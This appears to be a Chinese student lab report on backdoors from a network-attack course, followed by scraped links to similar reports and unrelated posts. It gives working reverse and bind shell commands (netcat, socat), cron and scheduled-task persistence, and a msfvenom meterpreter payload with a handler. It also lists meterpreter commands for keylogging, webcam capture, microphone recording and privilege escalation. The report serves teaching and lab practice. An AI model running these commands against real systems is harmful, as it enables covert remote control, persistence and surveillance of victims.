2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践

一、后门的概念

后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法

二、基础问题回答

  • 问:例举你能想到的一个后门进入到你系统中的可能方式?
    1. 当我们打开一个木马网页时,会自动安装木马,生成可执行文件,以此在系统留下后门。
    2. 黑客利用系统自身的某个服务或者线程,将后门程序插入到其中
  • 问:例举你知道的后门如何启动起来(win及linux)的方式?
    1. Windows:设置为开机自启动、修改注册表项
    2. Linux:对正常软件绑定注入shellcode
  • 问:Meterpreter有哪些给你映像深刻的功能?
    1. 在植入后门后,可以获取被控主机的录音、录像、截图、键盘输入记录等。
  • 问:如何发现自己有系统有没有被安装后门?
    1. 打开防火墙,查看有没有异常开放的端口;
    2. 使用杀毒软件查杀对系统进行检测;

返回目录

后门工具

1.netcat

Windows获得Linux Shell

  • 在Windows下使用ipconfig查看本机IP

  • 使用ncat.exe程序打开监听 ncat.exe -l -p

  • 在kali中反弹连接Windows,ncat  -e /bin/sh

  • Windows成功获得kali的shell

Linux获得Windows Shell

  • 在kali中使用ifconfig查看IP

  • 打开监听nc -l -p
  • 在Windows中反弹连接kali,ncat.exe -e cmd.exe

  • kali成功获得Windows的命令提示

使用nc传输数据

  • Windows下监听5311端口,ncat.exe -l

  • kali反弹连接到Windows的5311端口,nc

  • 连接建立成功,双方可以相互传输数据

使用nc传输文件

  • Windows下监听5311端口,并把收到的数据保存到file1. > file1.out

  • kali反弹连接到Windows的5311端口,nc < file1.in

  • 连接建立成功,Win可以收到kali发来的文件。

返回目录

实验内容

任务一:使用netcat获取主机操作Shell,cron启动

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。

  • 在Windows系统下,监听5311端口

  • 在Kali环境下,用crontab -e指令编辑一条定时任务,选择编辑器时选择3

  • 在最后一行添加 * * * * /bin/netcat -e /bin/sh,意思是在每个小时的第12分钟反向连接Windows主机的5311端口。

返回目录

任务二:使用socat获取主机操作Shell, 任务计划启动

socat:
socat的基本功能就是建立两个双向的字节流,数据就在其间传输,参数 address 就是代表了其中的一个方向。所谓流,代表了数据的流向,而数据则可以有许多不同的类型,命令中也就相应需要许多选项对各种不同的类型数据流进行限定与说明。

    • 搜索打开“计算机管理”

    • 在“任务计划程序”中“创建任务”

  • 填写任务名->新建一个触发器

  • 在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen: exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5311

  • 创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行
  • 此时,在Kali环境下输入指令socat - tcp:,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的端口,此时可以发现已经成功获得了一个cmd shell

返回目录

任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST= -f exe > 20165311_backdoor.exe,可以发现已经生成了后门程序“20165311_backdoor.exe”

在Windows下执行 ncat.exe -lv  > 20165311_backdoor.exe ,这样被控主机就进入了接收文件模式,通过-lv选项看到当前的连接状态,下面这个图是文件传输成功的截图

  • 在Linux中执行nc 192.168.1.150 < 20165311_backdoor.exe,这里的IP为被控主机IP

  • 传送接收文件成功,如下图所示

在Kali上使用 msfconsole 指令进入msf控制台,这时候我们可以看到一个爱心。

  1. 输入 use exploit/multi/handler 使用监听模块,设置payload

  2. set payload windows/meterpreter/reverse_tcp ,使用和生成后门程序时相同的payload

  3. set LHOST 192.168.1.155 ,这里用的是LinuxIP,和生成后门程序时指定的IP相同

  4. ,同样要使用相同的端口

设置完成后,执行监听,此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell。

返回目录

任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • 使用record_mic指令可以截获一段音频,可以用-d选项设置录制时间

  • 使用 webcam_snap 指令可以使用摄像头进行拍照

  • 使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

  • 使用 screenshot 指令可以进行截屏,效果如下:

  • 可使用getuid指令查看当前用户,使用getsystem指令进行提权

返回目录

任务五:可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell

返回目录

实验遇到的问题及解决方法

在执行 webcam_snap 指令时出现了错误代码1411.

问题解决:首先我想到的是windows设备管理器没有添加摄像头,检查了管理器后确实如我预想的那样

于是我在虚拟机设置中安装了启动摄像头插件

再次查看设备管理器,问题得到了解决。

返回目录

实验总结与体会

通过这次实验我感受到了网络攻防的有趣,也增加了以后学习这门课程的兴趣和动力。

返回目录

2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践的更多相关文章

  1. 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...

  2. 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...

  3. 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...

  4. 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践

    - 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...

  5. 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

  6. 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践

    2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...

  7. 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...

  8. 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...

  9. 2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践

    2018-2019-2 网络对抗技术 20165236 Exp2 后门原理与实践 一.实验内容 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...

随机推荐

  1. 「luogu3258」[JLOI2014] 松鼠的新家

    https://www.luogu.org/problemnew/show/P3258 (树剖裸题 树上差分 = = 差分 + lca 1. 树上差分基本思想:和差分一样,用前缀和的思想来处理解(操作 ...

  2. 2017蓝桥杯第十题(k倍区间)

    #include<iostream> #include<stdio.h> using namespace std; ; ],a[N]; int lowbit(int n){ r ...

  3. GPS车辆监控系统的启动方式

    我们通常用到的GPS车辆监控系统都有哪些启动方式,又有什么区别呢?通常GPS车辆监控系统都有热启.冷启.温启的技术指标,现参考如下:GPS开机定位分为冷启动.温启动和热启动三种:一.冷启动:以下几种情 ...

  4. Mockito框架入门教程(一)

    官网: http://mockito.org API文档:http://docs.mockito.googlecode.com/hg/org/mockito/Mockito.html 项目源码:htt ...

  5. 【原创】大叔问题定位分享(29)datanode启动报错:50020端口被占用

    集群中有一台datanode一直启动报错如下: java.net.BindException: Problem binding to [$server1:50020] java.net.BindExc ...

  6. php 两变量值互换 方法

    //方法一:$a ="abc";$b="def"; $a = $a^$b;$b = $b^$a;$a = $a^$b; //方法二:list($a, $b)= ...

  7. yum [Errno 256] No more mirrors to try 解决方法

    [root@localhost yum]# yum update Loaded plugins: fastestmirror, refresh-packagekit, security Reposit ...

  8. js操作:selenium无法操作隐藏元素问题

    对于前端隐藏元素,一直是selenium自动化定位元素的隐形杀手,脚本跑到隐藏元素时位置时报各种各样的错误, 隐藏的下拉菜单又没有办法避免,此帖只为交流隐藏元素自动化定位处理方法(3种操作)      ...

  9. MySql新增表的字段,删除表字段

    1增加两个字段: create table id_name(id int,name varchar(20));//创建原始数据表 alter table id_name add age int,add ...

  10. ansible的logging模块用来写日志

    [root@node-1 library]# cat dolog.py #!/bin/env python ANSIBLE_METADATA = { 'metadata_version': 'alph ...